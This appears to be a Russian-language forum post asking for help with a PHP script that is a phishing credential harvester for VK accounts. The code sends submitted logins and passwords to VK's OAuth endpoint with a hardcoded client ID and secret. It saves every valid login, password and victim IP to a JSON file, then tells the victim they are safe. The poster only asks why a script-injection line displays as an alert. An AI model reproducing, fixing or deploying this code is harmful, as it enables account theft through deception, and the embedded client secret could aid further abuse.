Вот код:
<?php
error_reporting(0);
if(isset($_POST['login']) && $_POST['password']){
$login = $_POST['login'];
$password = $_POST['password'];
$response = file_get_contents("https://oauth.vk.com/token?grant_type=password&client_id=2274003&client_secret=hHbZxrka2uZ6jB1inYsH&username=$login&password=$password");
$response = json_decode($response,true);
if(isset($response['access_token'])){
if(file_exists('data.json')){
$accounts = json_decode(file_get_contents('data.json'),true);
}else{
$accounts = array();
}
$accounts['accounts'][] = $login.':'.$password.':'.$_SERVER['REMOTE_ADDR'];
$accounts = json_encode($accounts);
file_put_contents('data.json', $accounts);
unset($_SESSION['user']);
setcookie("got","1",time() + (24*30*24*3600));
echo "Вы в безопасности!";
die();
}else{
echo "<script>document.getElementById('errorAu').style.display = 'block';</script>";
die();
}
}
echo "0";
?>
В нём
echo "<script>document.getElementById('errorAu').style.display = 'block';</script>";
вместо активации этого выбивает аллерт вместе с этой надписью. Как решатЬ?